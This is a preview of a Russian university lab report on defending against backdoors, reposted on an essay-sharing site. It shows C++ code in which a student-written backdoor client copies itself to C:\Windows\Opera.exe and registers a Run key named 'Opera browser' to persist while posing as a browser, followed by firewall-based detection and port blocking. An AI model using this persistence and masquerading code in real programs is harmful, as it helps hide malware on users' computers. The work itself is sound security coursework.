Essays.club - Получите бесплатные рефераты, курсовые работы и научные статьи
Поиск

Защита от встраиваемых потайных ходов

Автор:   •  Сентябрь 27, 2022  •  Лабораторная работа  •  3,537 Слов (15 Страниц)  •  302 Просмотры

Страница 1 из 15

  1. Министерство образования и науки Российской Федерации
  2. Санкт-Петербургский Политехнический Университет Петра Великого
  3. Институт прикладной математики и механики
  4. Кафедра «Информационная безопасность компьютерных систем»

ЛАБОРАТОРНАЯ РАБОТА № 4

  1. «Защита от встраиваемых потайных ходов»
  2. по дисциплине «Основы информационной безопасности»

  1. Выполнили
  2. студент гр. 4851001/10002                       Сергеев Н.С.

                                                         <подпись>

  1. Проверил
  2. преподаватель                       Калинин М.О.

                                            <подпись>

  1. Санкт-Петербург 2022

  1. Цель работы

Приобрести навыки по анализу структуры, функциональности и угроз специально встраиваемого дефекта программного продукта – потайного хода (backdoor), а также изучить методы защиты от уязвимостей такого вида.

  1. Ход работы
  1. Использованные методы маскировки:

Для маскировки клиентская часть программы запускается без окна. Название программы похоже на название исполняемого файла одного из распространённых веб браузеров, что должно вызвать дополнительное доверие. При прописывании ключа в реестре для автозагрузки используется строка «Opera browser», что намекает на необходимость запуска.

  1. Описание добавления программы-клиента в автозагрузку:

Поскольку предполагается использование потайного хода на Windows-системе, клиентская программа добавляет в системный реестр ключ для автоматической загрузки вместе с системой. В исходном коде клиента это метод autoloading();. Перед этим программа копирует себя в системный каталог, и прописывает автозапуск для исполняемого файла уже из диска C. Таким образом, удаление первоначального файла не приведёт к решению проблемы.

void autoloading()

{

        HKEY hKey = NULL;

        char way[0x100];

        GetModuleFileName(NULL, way, sizeof(way)); //извлекает полный путь доступа к исполняемому файлу

        CopyFile(way, "C:\\Windows\\Opera.exe", 1); //копирует существующий файл в новый файл

        LONG rc = RegOpenKeyEx(HKEY_CURRENT_USER, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, KEY_ALL_ACCESS, &hKey);

        if (rc == ERROR_SUCCESS)

        {

                way[0] = '\0';

                strcpy(way, "C:\\Windows\\Opera.exe");

                RegSetValueEx(hKey, "Opera browser", NULL, REG_SZ, (LPBYTE)way, strlen(way)); //создает параметр в разделе реестра

                RegCloseKey(hKey);

        }

        else

        {

                printf("Error!");

        }

}

  1. Межсетевой экран Comodo:

Установив программный межсетевой экран “Comodo Фаервол” на атакуемый компьютер, фиксируем список открытых сетевых портов, а также отмечаем поведение межсетевого экрана на запуск клиента:

[pic 1]

Рис. 1. Список открытых портов

После того, как разрешаем запрос на соединение, фиксируем сетевые порты, которые ими использовались. Блокируем их и по новой производим запуск клиента и сервера. После блокировки порта соединение с сервером не было установлено.

...

Скачать:   txt (21 Kb)   pdf (207.3 Kb)   docx (62.3 Kb)  
Продолжить читать еще 14 страниц(ы) »
Доступно только на Essays.club